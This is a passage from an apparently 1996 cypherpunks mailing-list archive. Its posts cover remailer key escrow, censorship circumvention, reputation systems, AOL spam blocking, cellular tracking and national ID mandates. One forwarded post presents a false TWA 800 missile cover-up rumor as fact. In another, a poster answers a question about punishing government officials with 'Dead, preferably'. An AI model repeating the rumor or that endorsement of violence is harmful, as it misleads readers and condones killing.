clarify, if I understand correctly you are proposing a penet style system with the database held in `netescrow'. The remailer in normal operation has access to the database by making requests satisfying the conditions of the secret share holders. When the remailer is compromised the memory resident key is lost when the machine is switched off, and the owner refuses to release the key. Is what you are proposing? It sounds like a cross between Matt's netescrow and Ross Anderson's eternity file system. Your penet database is being stored in a distributed file system, with shares, and the identity of the share holders is concealed. However the aim is not to prevent others censoring your publically available writings, but to allow a second avenue of access only in the case of `mob cryptography'. This changes the system over storing the database encrypted on the remailer machines own disk in these ways: 1. When the police shut down the remailer and ask the operator to hand over the key he can decline, but they can (theoretically) get the database from the netescrow, if they can convince enough share holders. If the police are unsucessful (seems likely) does this offer the operator much solice in his jail time for contempt of court, to know that he has a vote of confidence in the moral correctness of his decision from a population of the net? Does it offer him any legal benefit? Are the share holders guilty of contempt also, does this lessen his guilt, and harshness of prosecution? (Remember that the share holders identity and location are unkown to the operator, in the netescrow model, if I remeber rightly). I'm not sure how useful this part is, unless the possibility of `mob cryptography' is the desired feature. I'd have thought an individual remailer operator would be more likely to fold than a group of anonymous crypto-anarchists. 2. You could add the twist of an alternative duress key, that would stand a real chance of successfully nuking the database. More satisfying. > Police investigations might apply "angry mob cryptanalysis" to find > a sender - convincing a sizable number of operators that a crime had > been committed with some particular piece of traffic. 3. Negative comment on the system: TLAs have a vested interest in themselves being most of the share holders. True of the ownership of the current remailers also of course. Is the aim of allowing `mob cryptography' the desired feature? If so this is NAK, `Net Access to Keys'. Fine by me, as long as it's strongly voluntary :-) (And hence useless for it's forced access purposes). NAK, is interesting in that it puts things to a vote, where the parties are anonymous, they are on the net, so it's a Net constitutency that gets to vote. It seems less evil than GAK. However I still have problems with it: problem 1: subterfuge by TLAs, they'll try to become share holders in a big way, and preventing them from doing this seems difficult without Chaumian style is-a-person credentials, to prevent multiple voting. Even with is-a-person TLAs would then target the credential issuer. (Much the same as the TLAs are able to create fake credit histories, identities, and so on currently). Unless there is a way to do a decentralised web of trust implementation of an `is a person' credential in such a way that it is difficult for TLAs to target. Perhaps it would be simpler to require a certain amount of ecash be paid as a vote, set it high enough that no one can afford to abuse it, TLAs included. problem 2: free speech is free speech even if it's unpopular. The tyranny of the majority problem. Non-voluntary NAK forces peer review on every one, and just because some peoples views rate badly in a lot of peoples eyes, doesn't mean they should be punished. Perhaps this problem can be mitigated by constructing the shares such that 99% of `is a person' checked votes certifying that they believe they have evidence that the nym in question is in the throws of nuking a major city for a ransom. So what do cpunks think of Matt's `Oblivious Key Escrow', formulated as NAK coupled with either is-a-person, or pay per vote to eliminate the multiple voter problem. It would force accountability and openess on our spooks, they have to explain, document clearly, or at least present some real convincing arguments. At the same time it would provide an argument against GAK, all legitimate (in the publics eyes, what other opinions count, this is a democracy isn't it) law enforcement needs met. However these advantages are balanced against the tyranny of the majority problem, which is better than tyranny by unaccountable TLAs, but still a problem, Adam -- #!/bin/perl -sp0777i Message-ID: >I wonder how they are doing this? We know that the Germans allow full >internet access (don't they?), so they can't be using a filtering http >proxy. I guess they're blocking on IP number (and perhaps port). One ISP uses a filtering proxy which still can access xs4all, while blocking the HTTP port to www.xs4all.nl for their users. Others simply block the IP number. Of course, everyone still can use the mirror sites, the anonymizer, open proxies, free Lynx accounts and www-by-mail services. The prosecutors don't seem to understand that yet. >might be a good idea for xs4all to gather up all of their spare IP >numbers, and alias the lot on their web site - this would increase the >number of blocked addresses needed. They are already rotating IP numbers. :) From nobody at cypherpunks.ca Fri Sep 6 17:53:26 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Sat, 7 Sep 1996 08:53:26 +0800 Subject: TWA 800 - Friendly Fire? Message-ID: <199609062048.NAA32689@abraham.cs.berkeley.edu> The latest rumor. The message came to me from a man who was Safety Chairman for the Airline Pilots Association for many years and he is considered an expert on safety. He would not ever spread idle rumor. In short, he is usually quite certain before saying anything! The following information about TWA Fight 800 was received this afternoon: (08-22-96 ) TWA flight 800 was shot down by a U.S. Navy guided missile ship which was in area W-105. W-105 is a Warning Area off the SouthEast coast of Long Island and is used by the military for missile firing and other military operations. Guided missile ships travel all over the world defending the US and they were conducting practice firings up over the top of a Navy P-3 radar plane who was on a Southwest heading about over the top of TWA 800. Evidently the missile is suppose to go over the top of the P-3 and the accuracy of the missile is being measured by instrumentation in the P-3. There was a USAir flight coming from the Southeast descending towards Providence, RI that had been cleared to 21,000 feet and the TWA 800 aircarft was restricted to 13,000 feet. The air traffic controller requested the USAir flight to turn on his landing lights with the idea that TWA might see his lights and identify him. At that point, he would clear the TWA flight to continue his climb. The P-3 was a non-beacon target (transponder OFF) flying southwest in the controlled airspace almost over TWA 800 and made NO calls to ATC. After the explosion, he continued his flight to the west and then called ATC and asked if they would like him to turn around and assist with the "accident!" You will remember that the first announcement about this accident came from the Pentagon. The spokesman mentioned that they were sending the Navy to the crash site. They immediately sent a Navy Captain who was replaced the next day by an Admiral. That Admiral is still on the scene. The FBI has conducted at least 3,000 eyewitness interviews and the NTSB has not been able to be a part of these interviews not have any access to the contents of them. Some of those eyewitnesses reported seeing lights. Those were probably the landing lights of the USAir plane. It has been a cover-up from the word go. The NTSB is there in name ONLY. All announcements made by Mr. Bob Francis say absolutely nothing and notice that the FBI is always standing beside or behind Mr. Francis and it would appear that his job is to make sure that nothing is said that would give away "THE BIG SECRET!" It is time to end this farce and tell the public the real truth as to what happened to TWA 800. My source shall remain my own but the above information is true and I believe it will all become known soon. Now that all of you know the real truth. From declan at well.com Fri Sep 6 17:55:26 1996 From: declan at well.com (Declan McCullagh) Date: Sat, 7 Sep 1996 08:55:26 +0800 Subject: Muckraker column Message-ID: Not sure it came through in my cut-and-paste, but the Muckraker column is of course by Brock Meeks and went up on the site today. -Declan From crypto at nas.edu Fri Sep 6 18:11:19 1996 From: crypto at nas.edu (CRYPTO) Date: Sat, 7 Sep 1996 09:11:19 +0800 Subject: Public briefing on the NRC cryptography policy report at... Message-ID: <9608068420.AA842055531@nas.edu> Subject: Public briefing on the NRC cryptography policy report at MIT on Sept 11 Cryptography's Role in Securing the Information Society A Public Briefing in Cambridge, Massachusetts Wednesday, September 11, 1996, 3:00-4:00 pm There will be a public briefing in Cambridge, Massachusetts by the National Research Council on this report. The briefing will be held at the Laboratory of Computer Science, MIT, Room NE43-518, 545 Technology Square, in Cambridge (off Main Street). Dr. Herbert Lin, study director for this report and senior staff officer of CSTB, will conduct the briefing. For further information, please contact Ron Rivest at (617) 253-6098 or rivest at theory.Ics.mit.edu. Pls post. From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 6 18:17:46 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 7 Sep 1996 09:17:46 +0800 Subject: Cellular phone tracing Message-ID: <01I96117UUVI9JDL62@mbcl.rutgers.edu> From comp.risks: Date: Mon, 2 Sep 1996 22:24:13 -0400 (EDT) From: glassman at sunsite.unc.edu Subject: FedEx monitoring of cellular phonecall locations [...] nowhere near either of those places, so I did not bother to mention my current location to the operator. The next day, Saturday, I called FedEx with the same cell phone from Blowing Rock to arrange the pickup. The operator immediately asked if I wanted them to come to the intersection that I had placed my call from the day before. Two days later, a FedEx operator confirmed that they are getting "new systems" at some locations that are able to record the locations from which cellular calls are placed. I have now asked Cellular One three times to explain to me why they do not tell subscribers that they pass this location information through the system, but to no avail. [...] ========== end fwd. From nobody at replay.com Fri Sep 6 18:18:01 1996 From: nobody at replay.com (Anonymous) Date: Sat, 7 Sep 1996 09:18:01 +0800 Subject: No Subject Message-ID: <199609062151.XAA18867@basement.replay.com> On 5 Sep 96 at 14:31, Anonymous wrote: > This can lead into a long argument about just _when_ violence is > initiated, where opinion is more important than fact, but IMO: Agreed, if you live in a world of fantassy.... > Mr. Bell, if he follows through on his scheme, *will* be initiating > violence. You urge us not to get into the argument about "just_when_violence is initiated" and proceed to state the "Mr. Bell... ...*will* be initiating violence". What is that english word? Dogmatic? Nahhh, there must be a more precise one. Please help me here... > There are two roads to take in life, convincing and coercing > others. Looters of all persuasions have always counted on that and it worked for them for thousands of years. > I worry that abuse of the very young and weak (for > now) anonymity system for the purpose of initiating, rather than > exposing, violence will lead to more government violence than we > already have. You could worry all you want, but your only way to assess wether or not it will happens is not through your feelings but trhough the use of your rational mind. Stop "feeling" and start thinking. > Perhaps I am wrong and there is no hope; but if so, > that means another revolution. Revolutions are very romantic > sounding, to those who have not been in a war. I suppose that this refers to AP. If so, go RTFM because you conclusions and the workings of AP are not compatible. AP would not lead to a war, per se. Neither a civil war. > I urge everyone to > read "Emancipating Slaves, Enslaving Free Men" by Jeffrey Rogers > Hummel for a look at what our last revolution got us (hint: it was > *not* less government). I urge you to have a look at what is at the root of the growth of govt. It is not things but ideas, basic premises about life and the interaction between individuals. Ultimately, basic premises about the nature of Man is what brought us more govt. To understand govt excess, you've got to understand what is into the brain of the govt peoples. jfa "One of theses centuries, the brutes, private or public, who believe that they can rule their betters by force, will learn the lesson of what happens when brute force encounters mind and force." - Ragnar Danneskjold :) Jean-Francois Avon DePompadour, Societe d'Importation Ltee Limoges porcelain, silverware and crystal JFA Technologies, R&D consultants physicists, technologists and engineers. PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From declan at well.com Fri Sep 6 18:22:38 1996 From: declan at well.com (Declan McCullagh) Date: Sat, 7 Sep 1996 09:22:38 +0800 Subject: DC lock and key, from HotWired Message-ID: http://www.hotwired.com/muckraker/ Muckraker By Brock Meeks More DC Lock and Key The Clinton administration will unveil new encryption legislation, dubbed the Key Recovery Initiative, as early as 9 September, Muckraker has learned. The bill's title is an exercise in Orwellian redirection - nothing more than an attempt to make the threadbare "key escrow" encryption concept, which was spawned via the infamous Clipper Chip, more vanilla-sounding. The Key Recovery Initiative is political hardball, calculated to split an industry currently reluctant to bow to pressure from the FBI and the National Security Agency to voluntarily adopt the key escrow encryption scheme. In making its pitch, the White House is "offering some sweetheart deals to a number of companies," says an industry source familiar with the administration proposal. Those "sweetheart deals" involve relaxing export controls on encryption software only for certain industries - finance, insurance, and health care, industry sources say. Such a move essentially leaves companies such as Netscape isolated. It's a classic divide-and-conquer strategy. In return for relaxing the export controls, the White House will ask companies in the targeted industries to provide concrete assurances that they will endorse a government-devised system of "key recovery encryption" in which the decoding keys to any scrambled data are turned over to a "trusted third party." Those third parties, of course, must first be verified and approved by the government via as yet undefined criteria. The decoding keys made available under this plan would be accessible to any law enforcement agency that could prove to a judge that it needed them to carry out an investigation. If that ambiguous level of "proof" can be provided, your keys are handed over without debate or recourse on your part. The administration's legislation will propose a "framework" based on "a global key management infrastructure," according to a little-publicized statement released by the White House on 12 July. A spokesperson from the vice president's office confirmed that the legislation will be drawn from this outline. The bill is an attempt to forge alliances with US trading partners so that data can be accessed and decoded across international borders. The legislation's blueprint includes: - Liberalizing export controls for encryption products dealing with financial, insurance, and health-care data. - A standards-setting procedure for "key recovery systems and products" that will be "eligible for general export licenses," and standards for products that the government will buy. - Transfer of export control oversight from the State Department, which currently maintains that encryption technology is a "munition," to the Commerce Department. [...] From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 6 18:26:37 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 7 Sep 1996 09:26:37 +0800 Subject: Whistleblowing on the Internet Message-ID: <01I960XGNBDW9JDL62@mbcl.rutgers.edu> From: IN%"stewarts at ix.netcom.com" "Bill Stewart" 3-SEP-1996 06:43:40.27 I would note that most unions are mostly run by populists of various varieties, who are generally against individual liberties - whether liberal or conservative populist doesn't make any real difference in the long run. To me, Pat Buchannan and Adolf Hitler look rather similar. >While some unions are clearly run by and for thugs, some employers have >also hired thugs to attack union organizers, and both unions and employers >have convinced government thugs to attack their opponents, though unions >generally have convinced governments to write laws with fines attached, >while employers have often had actual Federal troops shooting union strikers, >and have had police refrain from defending strikers from attack. I object to union members getting beaten up for union membership, striking, etcetera, just as much as I object to members of any other non-governmental organization being beaten activity. But there's a difference between the right not to get beaten up and someone claiming that union membership - still less not working - isn't a perfectly legitimate reason for firing someone. The state should not be interfering in this matter, in either direction. >In a free market, there wouldn't be laws requiring or forbidding union >membership, and some unions would prosper by providing good service to their >members and to the employers that hire them, while others wouldn't. Quite.... but unions that survive under a free market will look a _lot_ different from today's unions. -Allen From mccoy at communities.com Fri Sep 6 18:32:47 1996 From: mccoy at communities.com (Jim McCoy) Date: Sat, 7 Sep 1996 09:32:47 +0800 Subject: Reputations Message-ID: gregburk at netcom.com (Greg Burk) writes: > mccoy at communities.com (Jim McCoy) writes: > > Greg Burk writes: [...] > > Go read Ender's Game by Orson Scott Card (a good book to read anyway :) > > and examine the nature of the computer network "discussion groups" he talks > > about: a classic example of reputation markets in many-to-many discussions. [...] > I have read it, a long time ago. Frankly, it's a spectacularly bad > example. He writes of the two child-protagonists gaining reputations as > great philosophers on a sort of Usenet. (At the time I believe OSC was a > member of Delphi, UNCLEORSON) > > Look around on the real Usenet. OSC could not have been more wrong. If you look closer you would probably be surprised to see things starting to move in this direction. As the number of participants has grown the "noise" in most newsgroups has grown to an unmanageable level. Now most newsreaders allow you to score authors or article threads so that you can keep individual reputation and interest files. I am actually an anomoly at my company, a collection of very net-savvy people, because I actually still participate in a few newsgroups; most of the interesting net discussions now take place on mailing lists which allow further reputation filtering (most mail agents have better and more flexible filters than news agents) and most bleeding-edge traffic happens in private mailing lists where one cannot even participate unless they have already established their reputation. If these lists were gatewayed to read-only newsgroups you would have what Card was talking about. > > > As an "asset", it is extremely non-liquid: > > > > > > How exactly would you "convert" your reputation into other capital? > > > Would you accept bribes and tell lies? Seems to me you would only get a > > > one-shot "conversion" and it couldn't possibly hope to equal your > > > investment. > > > > Tell that to Walter Cronkite, Siskel & Ebert, Moody's and others who have > > converted reputation capital into large piles of money [...] > > You don't seem to realize you are actually including at least one major > example of a counterfeit reputation here. > > I speak of Siskel & Ebert, whom I have caught at least once giving a > strikingly dishonest review. I had seen the movie (See You In The > Morning) on opening day, before they reviewed it. It stunk. No, this is just an example of how reputations are not global values, each reputation is modified by the perspective of the user. _You_ disagreed with the review and have probably used your experience to weight the values of future reviews by those particular reviewers. This is why there are hundreds of different sources of reviews for movies, people weight the recommendation given by the reviewer with > Conclusion: They knew it stunk, but for some reason I won't speculate on > they wanted to say they liked it so they misreported it, and covered > their butts with a review that would look mixed later but sound like a > rave now. I see a counterfeit reputation. Incorrect. One thought it was a good film and the other disagreed. You did not find it to be a good film and have since modified your weighting of the Siskel & Ebert reputation value to reflect this. It is highly improbable that there were any behind-the-scenes machinations between the movie backers and the reviewers: such a person has a value which is directly proportional to being viewed as impartial and once they have established a reputation the value in maintaining the reputation outweighs the value a potential briber could gain by trying to influence the review (nothing will drop the reputation faster than getting caught cheating, and a single reviewer does not have enough influence on the public to impact a films box office returns enough to make the bribe worthwhile.) It is more likely that you just disagreed with the review and you have since learned your lesson and now seek multiple review sources or else switched to a different source for movie review information (dropping your personal weighting of Siskel & Ebert down below other sources.) > > No, I think that you just don't understand the mechanics of reputations and > > how they interact with the most important resource in most people's lives: > > time. > > I'm tempted to tit-for-tat, but I will not refute your points by telling > you you just don't understand. I guess I could have been more diplomatic, but it seems that you just do not understand that reputations are not a global value, rather they are a weighted value which is modified over time as the user seeks to determine a balance of raters and reviewers which most closely represents their particular viewpoints, interests, and experiences. There is no one single reputation which a given person has, all reputations are dependant upon the source of the reputation and the context in which that particular reputation is used. > > time. Instead of thinking of "reputation" look at it from the other end and > > consider the "attention marketplace." > > Fine, but resolving good vs counterfeit reputations takes time too. *Sigh* There is no such thing as a "counterfeit" reputation. When someone joins a network with a particular set of interests they will start off by finding a reputation service(s) which they think, though various channels ranging from advertisement to word of mouth, closely matches their interests and views. This is the only time that outright deception can influence a person and it is also the point at which deception is least profitable (because the deceiver will be easily revealed once the user compares the reputations with what they expect to see and because most new users will choose multiple services to perform comparison shopping.) There may even be reputation services which rate other reputation services to let people know how the service compares to its stated viewpoints and advertisements. A reputation service gains income by establishing a long-term replationship with the customer, so it is in the services interests to maintain credibility with its users. If they do not then that reputation service will have a negative weighting depending on what the user is interested in, so the problem of correct vs. incorrect reputations will itself be handled by reputation services. An individual will have multiple reputations depending on which service is providing the reputation and the context in which the reputation is being used. "Tim May" may have a relatively high reputation in most services on cryptography and crypto-anarchy issues but this reputation will not apply to football predictions or articles posted to soc.culture.swedish. Someone may try to burn a reputation to pass off a false statement as truth, but this is as unlikely to work as it is for Peter Jennings to tell all of his viewers that this afternoon Bill Clinton appointed me his senior domestic policy advisor; people now have a wide variety of news and information sources to use for comparing the veracity of the statement, getting caught diminishes his reputation and this has a monetary value to him, and because his audience is larger due to his increased reputation there is a greater chance that others will investigate the matter and so his chance of getting caught is higher. > > Right now reputation markets have a > > limited presence on the internet (mostly through killfiles) because the > > tools required are not integreated into the tools used to browse the > > information. In time this will change. > > How? I ask for something more specific than In The Future Everything > Will Be Done Right. Version 0.1 (coming to a news server near you by the end of the year) will take the form of a service whereby you can subscribe to a usenet filtering service which will present your newsreader with a database of articles which have already been filtered by the reputation service to remove off-topic and "me too" posts (or perhaps based upon other filtering criteria.) The agency making this service possible will also sell to individuals or groups the ability to start their own service on this news host and perform whatever filtering they want, this will also include adaptive filters (if I can ever get the little bastards to use an internal weighting function which does not converge too quickly) which will attempt to learn the general weighting criteria are so that the people running reputation filtering need only update the filters occasionally and not score each and every posting. The hard part, and the part which is slowly gaining enough momentum to make this possible, is the integration of cryptographic signatures into messages so that one can determine the authenticity of a message and thereby assign a reputation value to a real identity instead of an easily forgeable email address. jim From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 6 18:35:25 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 7 Sep 1996 09:35:25 +0800 Subject: Edited Edupage, 5 Sep 1996 Message-ID: <01I961B37F9U9JDL62@mbcl.rutgers.edu> From: IN%"educom at educom.unc.edu" 5-SEP-1996 22:55:23.70 >************************************************************ >Edupage, 5 September 1996. Edupage, a summary of news about information >technology, is provided three times a week as a service by Educom, >a Washington, D.C.-based consortium of leading colleges and universities >seeking to transform education through the use of information technology. >************************************************************ [...] >AOL BLOCKS JUNK MAIL SITES >America Online is blocking all electronic mail sent from five Internet sites >that have been used to send hundreds of thousands of unsolicited messages to >AOL customers. In turn, Cyber Promotions Inc., which is associated with >three of the sites, has accused America Online of hypocrisy for "censoring" >commercial messages sent from other sites but allowing AOL itself to sponsor >commercial promotions. AOL dismisses the charge as an "apples and oranges >comparison." (New York Times 5 Sep 96 C2) There's been a court suit to stop AOL from doing so, which appears to have gotten a temporary injunction to that effect... I'll forward the details. >CHINA SCREENS OUT "SPIRITUAL POLLUTION" ON THE NET >The Beijing government has begun blocking as many as 100 Internet sites that >offer material the government deems unsuitable for its citizens -- including >dissident viewpoints from Hong Kong and Taiwan, sites sponsored by U.S. >major media organizations such as CNN and the Washington Post, and sexually >explicit sites such as Playboy and Penthouse. An official described the >blocked sites as suspected purveyors of "spiritual pollution." (Wall Street >Journal 5 Sep 96 B12) Hmm... funny similarity between Chinese objections of "spiritual pollution" and ASEAN objections of "cultural" problems, isn't there? [...] >Edupage is written by John Gehl & Suzanne Douglas >. Voice: 404-371-1853, Fax: 404-371-8057. >Technical support is provided by Information Technology Services at the >University of North Carolina at Chapel Hill. >************************************************************ >Edupage ... is what you've just finished reading. To subscribe to Edupage: >send mail to: listproc at educom.unc.edu with the message: subscribe edupage >Roy Lichtenstein (if your name is Roy Lichtenstein; otherwise, substitute >your own name). ... To cancel, send a message to: listproc at educom.unc.edu >with the message: unsubscribe edupage. (If you have subscription problems, >send mail to manager at educom.unc.edu.) From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 6 18:40:53 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 7 Sep 1996 09:40:53 +0800 Subject: Court challenge to AOL junk-mail blocks Message-ID: <01I961K8307I9JDL62@mbcl.rutgers.edu> I wouldn't personally use AOL in any event, but their use of their computers is their business. I do have some doubts as to whether AOL subscribers necessarily signed on for this - as noted on the list-managers list, a consent arrangement would thus be preferable. The other argument of the Cyber Promotions jerks is nonsense - how does AOL blocking affect the rest of the Internet? -Allen >PHILADELPHIA, Pa. (Sep 6, 1996 12:23 p.m. EDT) -- A federal judge has = >ordered America Online to stop blocking up to 1.8 million "junk" e-mail = >files flooding subscribers' electronic mailboxes daily from a = >Philadelphia marketing firm. [...] >Pending a trial tentatively scheduled for Nov. 12, U.S. District Judge = >Charles R. Weiner ordered AOL Thursday to lift the block on Cyber = >Promotions' mailings. Weiner is presiding over a suit Cyber Promotions = >Inc. filed accusing AOL of trying to drive it out of business. >Cyber Promotions controls three of the five sites blocked by AOL. The = >others -- one that distributes software to create bulk e-mail lists and = >one that had sent out ads for Internet video porn -- were not affected = >by Weiner's order. >AOL attorney David Phillips said the company was considering an appeal. = >He said AOL customers had been "complaining vociferously about Cyber = >Promotions' junk mail." >Sanford A. Wallace, the president of Cyber Promotions, was pleased about = >the decision. >"We feel that America Online has violated the civil rights of their = >members and has violated our rights to send e-mail through the Internet, = >which AOL does not own," he said. >Although unsolicited mail sent through the post office in the United = >States is not considered illegal, the rules have yet to be defined in = >cyberspace. The larger services -- AOL, Prodigy and Compuserve -- all = >have policies forbidding mass junk mailings From frissell at panix.com Fri Sep 6 18:45:25 1996 From: frissell at panix.com (Duncan Frissell) Date: Sat, 7 Sep 1996 09:45:25 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.32.19960906224034.00aed230@panix.com> >Indeed. It appears the Unabomber has taken away the privelege of >dropping stamped mail weighing over 16ozs into street-side mailboxes. >One is now instructed to take these packages to a post-office mail >clerk for mailing. So switch to Fedex. The P.O. gives lousy service anyway. Privitize. DCF From jimbell at pacifier.com Fri Sep 6 18:57:55 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 7 Sep 1996 09:57:55 +0800 Subject: Doing away with govt. people Message-ID: <199609062301.QAA18475@mail.pacifier.com> At 12:13 PM 9/6/96 -0700, Dale Thorn wrote: >Gee, if we could just prosecute "the govt." under auspices of the >"three strikes" legislation: > >Gehlen Deal MK/ULTRA >"That 'Bay of Pigs' thing" ZR/RIFLE >Watergate MH/CHAOS >Iran/Contra Phoenix Program >BCCI/BNL COINTELPRO >INSLAW Waco, etc. You've probably heard of the "RICO statute," or "Racketeer-Influenced and Corrupt Organizations" law. It's both criminal and civil: You're supposed to be able to bring a RICO lawsuit against an organization and get triple damages. Maybe somebody should try it and name the federal government as defendant...There's certainly plenty of evidence. >Just say "Three strikes and you're (what?)" "Dead," preferably. Jim Bell jimbell at pacifier.com From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 6 19:13:48 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 7 Sep 1996 10:13:48 +0800 Subject: More identification laws Message-ID: <01I960QKGRV49JDL62@mbcl.rutgers.edu> From: IN%"rre at weber.ucsd.edu" 2-SEP-1996 22:33:17.31 [The new welfare bill in the US has profound privacy implications and will require major new identification systems and databases. See the article on the front page of today's (9/2/96) New York Times for some details. (There's a bunch of useful Internet stuff in the business section too.) This issue of the Privacy Forum, which I've abridged and rearranged, includes three items on Social Security Numbers and another on fingerscanning. This is really it: pressures for universal identifiers are growing exponentially from a hundred directions as we speak. I wish I knew how to communicate the magnitude of it. If half the stuff currently being launched in this area really happens then the world is going to be completely different a year from now -- give it two if the system development projects choke as per usual on their overambition. I hope you're not sick of this topic, because you'll be hearing lots more about it this autumn. Educate, agitate, organize. Please. Speaking of which, I've also enclosed a note about a Privacy International web page on national identification cards.] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Sun, 1 Sep 96 18:14 PDT From: privacy at vortex.com (PRIVACY Forum) Subject: PRIVACY Forum Digest V05 #16 PRIVACY Forum Digest Sunday, 1 September 1996 Volume 05 : Issue 16 ---------------------------------------------------------------------- Date: Fri, 30 Aug 1996 10:51:45 -0700 (PDT) From: jd at scn.org (Janeane Dubuar) Subject: NCSL ALERT: Driver's Licenses and Birth Certificates This alert came by mail from the National Conference of State Legislatures in Washington, D.C. I added an update which includes the names of House-Senate conferees. The federal immigration bill (H.R. 2202) is expected to emerge from conference committee some time during the first week of September. Now is the time to act. TOWARD A NATIONAL IDENTIFICATION CARD AND MORE RED TAPE: CONGRESS MANDATES CHANGES TO DRIVER'S LICENSES AND BIRTH CERTIFICATES On May 2, 1996, the U.S. Senate passed S. 1664 (now called H.R. 2202 - Senate version), a bill to reform illegal immigration, that proposes monumental changes to all driver's licenses and birth certificates (section 118). These changes will force most U.S. citizens to obtain and pay for new driver's licenses and birth certificates; compromise each citizen's right to privacy; violate state and local control over driver's licenses and birth certificates; and invite discrimination against minorities. The Congressional Budget Office estimates that the federal driver's license mandate alone will shift up to $20 million in costs to states and localities. The House also passed an immigration bill, H.R. 2202. The House bill does not contain the driver's license and birth certificate mandates. Both House and Senate immigration staff are currently reconciling the two bills in an informal conference committee. Phone calls to House and Senate Leadership are urgently needed to demand that the driver's license and birth certificate mandates be deleted from the final bill. What Does the Senate Version of H.R. 2202 Require? 1. Driver's Licenses - State driver's licenses and identification cards MUST CONTAIN THE APPLICANT'S SOCIAL SECURITY NUMBER. The federal government will also create new federal standards for the application process and design of all driver's licenses and ID cards. States that currently retain and verify an applicant's social security number but do not place the number on the cards are initially exempt from the social security number mandate. According to the American Association of Motor Vehicle Administrators, of the 38 states that do not require the social security number to be on their driver's licenses, only Massachusetts would qualify for this exemption; all other states would be required to place social security numbers on driver's licenses and ID cards. All states are required to conform to the other federal standards. States with cycles of renewal longer than six years must start October 1, 2006. After October 1, 2006, NO ONE may use a driver's license or ID card for identification purposes that does not meet these federal standards. 2. Birth Certificates - All birth certificates must be printed on federally-approved safety paper and be certified by the issuing agency. The federal government will also issue additional provisions requiring other security features in the future. Starting in 1999 (three years after the bill's enactment), birth certificates that do not meet these federal standards cannot be accepted by any federal agency or by any state or local agency that issues driver's licenses or ID cards. Who Needs a New Driver's License? Anyone who wants to use their driver's license as a valid form of identification after October 1, 2006. If you need to use a driver's license to vote, to apply for a passport, to qualify for a federal school loan, license, contract or public assistance program or to meet any other federal, state or local requirement you will need a new driver's license. Will I Have to Put My Social Security Number on My Driver's License? Yes. While most states currently give applicants the option of not using this number on their driver's license or prohibit its use outright, the new federal requirements will force almost every American to put their social security number on their license or ID card. Many citizens are concerned by laws that increase the circulation of their social security number. The social security number is a key which provides access to vital personal information, which could be misused if it fell into the wrong hands. Others believe that proposals making driver's licenses uniform, including social security numbers, are a significant step toward a national ID card. Finally, many minorities contend that they will be disproportionately affected by the new requirements because they will be asked to show their documents more often than other Americans. Who Needs a New Birth Certificate? Anyone who wants to use their birth certificate as a valid form of identification after October 1, 1999. If you need to use your birth certificate to establish citizenship, apply for or renew a driver's license, passport or other identification documents, obtain a marriage license, register to vote, change your name, or many other purposes you will need a new certificate. No matter how old you are, if you need to use your birth certificate it must conform to the new federal standards, otherwise it is invalid. Fees will almost certainly be charged for new birth certificates to pay for the new federal requirements. This will impose a significant hardship on elderly and low-income Americans. THE DRIVER'S LICENSE AND BIRTH CERTIFICATE MANDATES IN ILLEGAL IMMIGRATION BILL H.R. 2202 (Senate) WILL... ...INCREASE SOCIAL SECURTY NUMBER FRAUD. H.R. 2202 (Senate version) will require the vast majority of automobile drivers in the U.S. to put their social security numbers on their driver's licenses. In the future, whenever someone shows their driver's license they will also be exposing their social security number. With the social security number accessible to so many people, it will be relatively easy for someone to fraudulently use your social security number to assume your identity and gain access to your bank account, credit services, utility billing information, driving history, and other sources of personal information. This new federal law will compound and exacerbate a disturbing trend reported by banks and credit card companies that social security number-related fraud is already on the rise. ...INVADE PRIVACY AND THREATEN CIVIL LIBERTIES. According to the Privacy Rights Clearinghouse, when social security numbers were first issued in 1936, the federal government assured the public that use of the numbers would be limited to social security programs. The driver's license and ID card provisions in H.R. 2202 (Senate version) violate this promise, and will dramatically increase the circulation of the social security number and its use as a national identifier. Now more corporations, creditors, insurance companies, government officials and others will be able to get easier access to vast amounts of personal information that can be used to support marketing schemes, determine insurance and loan eligibility, gain an advantage in a lawsuit, etc. ...PREEMPT STATE LAWS AND SHIFT COSTS TO STATES AND LOCALITIES. According to the Automobile Association of America, 38 states do not require drivers to put their social security numbers on their driver's licenses. Legislation has been introduced in a number of states (including Mississippi and Hawaii) that require social security numbers on their driver's licenses to take the numbers off the card because of fraud and privacy problems. The new federal law would require all but Massachusetts to change their laws, taking this option away from the majority of the nation's drivers and limiting state authority to decide whether this policy is appropriate for their residents. The bill also gives the federal government wide latitude to develop new and more costly requirements for state driver's licenses, ID cards and birth certificates in the future. According to the Congressional Budget Office, the new unfunded federal mandates in the law will shift up to $20 million in costs to states and force states and localities to increase fees for birth certificates to pay for new federal requirements. ...LEAD TO A NATIONAL ID CARD THAT DISCRIMINATES AGAINST MINORITIES. By requiring states to tie the social security number to state-issued identification documents, the proposal marks a dramatic shift toward using the number as an identifier. Today's mandate that the states follow federal requirements in their identification documents will lead to tomorrow's mandate: that the federal government issue the identification documents itself to ensure uniformity and reliability. Make no mistake: this provision is a key building block for national identification documents, and the national ID card. If such an ID card is mandated, Latinos, Asians, and other Americans who "look foreign" or speak with an accent will be expected to produce this document far more often than other Americans, especially 